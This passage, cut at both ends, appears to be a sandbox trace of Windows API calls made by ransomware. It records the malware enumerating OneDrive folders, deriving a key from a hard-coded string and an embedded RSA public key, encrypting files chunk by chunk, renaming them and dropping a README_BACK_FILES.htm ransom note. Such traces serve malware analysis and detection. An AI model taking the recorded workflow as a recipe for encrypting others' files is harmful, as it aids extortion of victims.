lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.004] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.004] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.004] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.004] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.004] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.004] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.004] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.004] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.004] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.005] ReadFile (in: hFile=0x5d80, lpBuffer=0x2f5e1d0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesRead=0x2b9ce68*=0x50, lpOverlapped=0x0) returned 1 [0282.005] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x50, dwBufLen=0x400 | out: pbData=0x2f5e1d0*, pdwDataLen=0x2b9ce68*=0x60) returned 1 [0282.005] WriteFile (in: hFile=0x5d4c, lpBuffer=0x2f5e1d0*, nNumberOfBytesToWrite=0x60, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5e1d0*, lpNumberOfBytesWritten=0x2b9ce68*=0x60, lpOverlapped=0x0) returned 1 [0282.005] CloseHandle (hObject=0x5d80) returned 1 [0282.005] CloseHandle (hObject=0x5d4c) returned 1 [0282.005] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nn-no\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nn-no\\filesync.localizedresources.dll.mui.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nn-no\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nn-no\\filesync.localizedresources.dll.mui"), bFailIfExists=0) returned 1 [0282.043] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nn-no\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x0) returned 1 [0282.043] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nn-no\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nn-no\\filesync.localizedresources.dll.mui.gsg")) returned 1 [0282.046] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nn-no\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nn-no\\filesync.localizedresources.dll.mui"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nn-no\\FileSync.LocalizedResources.dll.mui.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nn-no\\filesync.localizedresources.dll.mui.fuck")) returned 1 [0282.048] CryptDestroyHash (hHash=0x2fa4c8) returned 1 [0282.048] CryptDestroyKey (hKey=0x2fc308) returned 1 [0282.048] CryptReleaseContext (hProv=0x2f1ed50, dwFlags=0x0) returned 1 [0282.048] FindNextFileA (in: hFindFile=0x2fa6c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0 [0282.048] FindClose (in: hFindFile=0x2fa6c8 | out: hFindFile=0x2fa6c8) returned 1 [0282.048] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nn-no\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nn-no\\readme_back_files.htm")) returned 0xffffffff [0282.048] AreFileApisANSI () returned 1 [0282.048] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2b20, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 99 [0282.048] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nn-no\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nn-no\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9e0d8, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d3c [0282.049] GetFileType (hFile=0x5d3c) returned 0x1 [0282.049] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2b9cd24*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9cd1c, lpOverlapped=0x0 | out: lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0282.075] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0282.076] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nso-za\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0282.076] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0282.076] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0282.076] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0282.079] GetLastError () returned 0x0 [0282.079] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nso-za\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nso-za\\filesync.localizedresources.dll.mui")) returned 0x20 [0282.080] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nso-za\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0282.080] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nso-za\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nso-za\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0282.081] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nso-za\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\nso-za\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d80 [0282.082] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\nso-za\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0282.083] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f1e1a0) returned 1 [0282.085] CryptCreateHash (in: hProv=0x2f1e1a0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0282.085] lstrlenA (lpString="IobgRfrtGtwdLWqndRsiYwqNzMlQm") returned 29 [0282.085] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0282.085] CryptDeriveKey (in: hProv=0x2f1e1a0, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fc4c8) returned 1 [0282.085] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0282.085] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0282.085] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f1ffe8) returned 1 [0282.086] CryptImportPublicKeyInfo (in: hCryptProv=0x2f1ffe8, dwCertEncodingType=0x1, pInfo=0x2f37cc0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f37cf0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f37cf8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fc308) returned 1 [0282.086] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0282.086] CryptEncrypt (in: hKey=0x2fc308, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1f548*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f1f548*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0282.087] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f1f548*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f1f548*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0282.088] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.270] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.270] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.272] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.272] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.272] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.272] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.272] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.272] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.272] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.273] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.273] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.273] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.286] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.286] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.286] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.286] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.286] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.286] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.286] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.286] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.287] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.287] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.287] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.287] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.287] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.287] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.287] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.417] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.417] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.417] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.417] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.417] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.417] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.418] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.418] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.418] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.418] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.418] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.418] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.418] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.418] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.418] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.418] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.418] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.418] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.418] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d9c0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0282.418] WriteFile (in: hFile=0x5d80, lpBuffer=0x2f5d9c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.419] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5d9c0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d9c0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0282.419] CryptEncrypt (in: hKey=0x2fc4c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d9c0*, 